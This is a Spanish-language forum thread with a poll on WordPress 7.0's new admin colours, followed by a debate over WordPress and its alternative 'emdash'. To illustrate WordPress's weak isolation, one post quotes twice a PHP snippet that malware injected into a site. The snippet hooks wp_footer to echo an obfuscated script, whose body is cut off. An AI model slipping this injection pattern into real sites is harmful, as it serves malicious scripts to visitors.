¿Qué te parece el nuevo estilo de wp 7.0?

• Autor Autor epsilo99
  • Fecha de inicio Fecha de inicio

¿Qué te han parecido los nuevos colores y diseño de la administración de wp?

• Me ha gustado mucho

Votos: 3 33,3%
  • Me gustaba más el estilo anterior

Votos: 2 22,2%
  • Me da lo mismo

Votos: 4 44,4%

• Votantes totales
    9
  • Encuesta cerrada .
epsilo99

epsilo99

1
Xi
Verificación en dos pasos activada
Suscripción a IA
Captura de pantalla 2026-05-21 113350.webp

Con la nueva actualización wp pasó de colores más tranquilos a un azul muy fuerte en mi caso, en lo que refiere a lo estético, más allá de las nuevas funciones que ha agregado.

A tí que te ha parecido los nuevos colores y diseño en esta nueva versión de wp?

Me parece que el nuevo azul le da una frescura al diseño, aunque puede ser algo chocante para algunos. La estética siempre es subjetiva, pero sin duda es un cambio audaz.

Mientras que el core sea un espanto, darle manitos de maquillaje y agregarle mas complejidad de la que ya tiene(para desarrolladores) es mas de lo mismo. Pero bueno, para gustos y colores...

Lo sigo desde la primicia y está destinado a morir como todas las alternativas que han salido desde siempre, emdash tiene mas probabilidades a morir que cualquiera de las alternativas a Wordpress que han salido en los últimos 10 años.

Lo que pasa es que amas wp por costumbre, cuando pruebes otras tecnologías y se te quite el dolor de cabeza que un simple update te rompe todo el sitio

Lo que pasa es que amas wp por costumbre, cuando pruebes otras tecnologías y se te quite el dolor de cabeza que un simple update te rompe todo el sitio
No es que ame a Wordpress, de hecho tengo muchos años que no lo uso.

Worpress es modular; robusto, fácil de usar y escalable (por algo prácticamente en términos de paginas web es el absoluto líder) tanto para personas sin conocimientos de programación como para programadores donde básicamente cualquier cosa te que imágenes lo puedes hacer.

Comencé a usar WordPress profesionalmente desde el 2008 y he visto innumerables "alternativas" morir, alternativas que eran muchísimo mas potentes y prometedoras que emdash, ya perdi la cuenta; quizas tu falta de experiencia te haga ver emdash como algo revolucionario, no te culpo muchos en algun momento fueron como tu comenzando.

En cuanto a tu comentario "cuando pruebes otras tecnologías y se te quite el dolor de cabeza que un simple update te rompe todo el sitio". Un sitio con wordpress se te rompe con un simple update? pues te estiendo mi mano amiga para enseñarte lo basico y que no te pasen esas novatadas (no lo digo en mal plan) , que fue creado para que cualquiera pueda usarlo no significa que sea facil para todo el mundo; en tu caso eres parte de la excepción y no hay que avergonzarse, cuando necesitas ayuda para actualizar tu web sin que se te rompa me puedes escribir que con mucho gusto te ayudo y te doy consejos; si aún sigue siendo muy avanzado para ti te recomiendo ir escalando poco a poco, puedes comenzar con dreamweaver, luego adobe muse y asi vas escalando hasta llegar al complicadisimo wordpress.

No es que ame a Wordpress, de hecho tengo muchos años que no lo uso.

Worpress es modular; robusto, fácil de usar y escalable (por algo prácticamente en términos de paginas web es el absoluto líder) tanto para personas sin conocimientos de programación como para programadores donde básicamente cualquier cosa te que imágenes lo puedes hacer.

Comencé a usar WordPress profesionalmente desde el 2008 y he visto innumerables "alternativas" morir, alternativas que eran muchísimo mas potentes y prometedoras que emdash, ya perdi la cuenta; quizas tu falta de experiencia te haga ver emdash como algo revolucionario, no te culpo muchos en algun momento fueron como tu comenzando.

En cuanto a tu comentario "cuando pruebes otras tecnologías y se te quite el dolor de cabeza que un simple update te rompe todo el sitio". Un sitio con wordpress se te rompe con un simple update? pues te estiendo mi mano amiga para enseñarte lo basico y que no te pasen esas novatadas (no lo digo en mal plan) , que fue creado para que cualquiera pueda usarlo no significa que sea facil para todo el mundo; en tu caso eres parte de la excepción y no hay que avergonzarse, cuando necesitas ayuda para actualizar tu web sin que se te rompa me puedes escribir que con mucho gusto te ayudo y te doy consejos; si aún sigue siendo muy avanzado para ti te recomiendo ir escalando poco a poco, puedes comenzar con dreamweaver, luego adobe muse y asi vas escalando hasta llegar al complicadisimo wordpress.

Comprendo amigo, el tema es que.

Soy programador hace mas de 15 años, colegiado o graduado, con muchísimos años de experiencia a nivel web, a un querido aqui @Torrecilla le trabaje como por 4 años e hicimos cientos de sitios webs en 99,9% en WP a medida para sus cientos de clientes, entonces no es algo de desconocimiento o falta de habilidades, es la suma de cosas que vas viendo aprendiendo y que tienes que optimizar.

Te daré un ejemplo claro, hace como un mes un usuario me contrato para que reparar su sitio wordpress ya que tenia un malware que desplegaba popup maliciosos, había comprometido su base de datos sus archivos y el mismo servidor web (un VPS).

El problema un SCRIPT original con licencia, que fue vulnerado y cargaba una linea de codigo

PHP:
include_once $_SERVER['DOCUMENT_ROOT'] . "/wp-load.php";
if( function_exists("add_action") && !has_action('wp_footer', 'wpp_core_fs_script') ) {
    add_action( 'wp_footer', 'wpp_core_fs_script' );
    function wpp_core_fs_script() {
        echo "<script>var _0x2b9652=_0x21f0;function _0x42bb()----</script>";
    }
}

Por eso mismo te digo aunque Wordpress es "modular" realmente no lo es, porque al ejecutar el php es de manera secuencial y monolitica no es un entorno aislado es el mismo entorno del core lo que compromete todo el core y la base de datos, si un solo uso de la variable global wpdb ya les da acceso completo a la base datos.

En fin usted tiene sus experiencias y se las respeto y yo las mías, capaz a usted se le de bastante bien el wordpress a mi también pero prefiero pasar de ser necesario, existen mejores alternativas y se siguen desarrollando mejores alternativas y tampoco se lo digo en mal plan,

Comprendo amigo, el tema es que.

Soy programador hace mas de 15 años, colegiado o graduado, con muchísimos años de experiencia a nivel web, a un querido aqui @Torrecilla le trabaje como por 4 años e hicimos cientos de sitios webs en 99,9% en WP a medida para sus cientos de clientes, entonces no es algo de desconocimiento o falta de habilidades, es la suma de cosas que vas viendo aprendiendo y que tienes que optimizar.

Te daré un ejemplo claro, hace como un mes un usuario me contrato para que reparar su sitio wordpress ya que tenia un malware que desplegaba popup maliciosos, había comprometido su base de datos sus archivos y el mismo servidor web (un VPS).

El problema un SCRIPT original con licencia, que fue vulnerado y cargaba una linea de codigo

PHP:
include_once $_SERVER['DOCUMENT_ROOT'] . "/wp-load.php";
if( function_exists("add_action") && !has_action('wp_footer', 'wpp_core_fs_script') ) {
    add_action( 'wp_footer', 'wpp_core_fs_script' );
    function wpp_core_fs_script() {
        echo "<script>var _0x2b9652=_0x21f0;function _0x42bb()----</script>";
    }
}

Por eso mismo te digo aunque Wordpress es "modular" realmente no lo es, porque al ejecutar el php es de manera secuencial y monolitica no es un entorno aislado es el mismo entorno del core lo que compromete todo el core y la base de datos, si un solo uso de la variable global wpdb ya les da acceso completo a la base datos.

En fin usted tiene sus experiencias y se las respeto y yo las mías, capaz a usted se le de bastante bien el wordpress a mi también pero prefiero pasar de ser necesario, existen mejores alternativas y se siguen desarrollando mejores alternativas y tampoco se lo digo en mal plan,
Así es tal como dices WordPress tiene ese problema de que puede ser modular pero es muy fácilmente hackeable, a veces cuesta encontrar el archivo donde está el código malicioso.

Por mi parte he hecho más de 1,000-2,000 páginas ahí (no las he contado) y vaya que sí es un tanto caótico, como bien dices aunque es modular tiene muchas desventajas (para qué nombrarlas todas xd), pero para un cliente que quiere una página web y sus necesidades no son muchas está bien.

Deja le echo un ojo a EM, para ver qué tal está 😄

Luego me cuentas qué has programado en estos últimos años, yo también he programado un par de cositas

Esto me hace acordar a la escena de Los Simpsons sobre la Baby Malibú

1779797190564.webp

No sé si el subrayado en azul debajo de Novedades lo traía en versiones anteriores, es curioso que este fin de semana le pedía a la inteligencia artificial que me hiciera un menú en html con varias opciones y me lo representó de la misma manera.

emdash tiene mas probabilidades a morir que cualquiera de las alternativas a Wordpress que han salido en los últimos 10 años.
En el nivel de WP: esto depende más en las rondas de financiamiento que su forma de formación.
Emdash tendrá el peligro de no atrapar suficientes $, una vez que la ola de IA y sus estupideces termine.
La gente ya esta desarrollando una aversion a todo relacionado con IA.

Atrás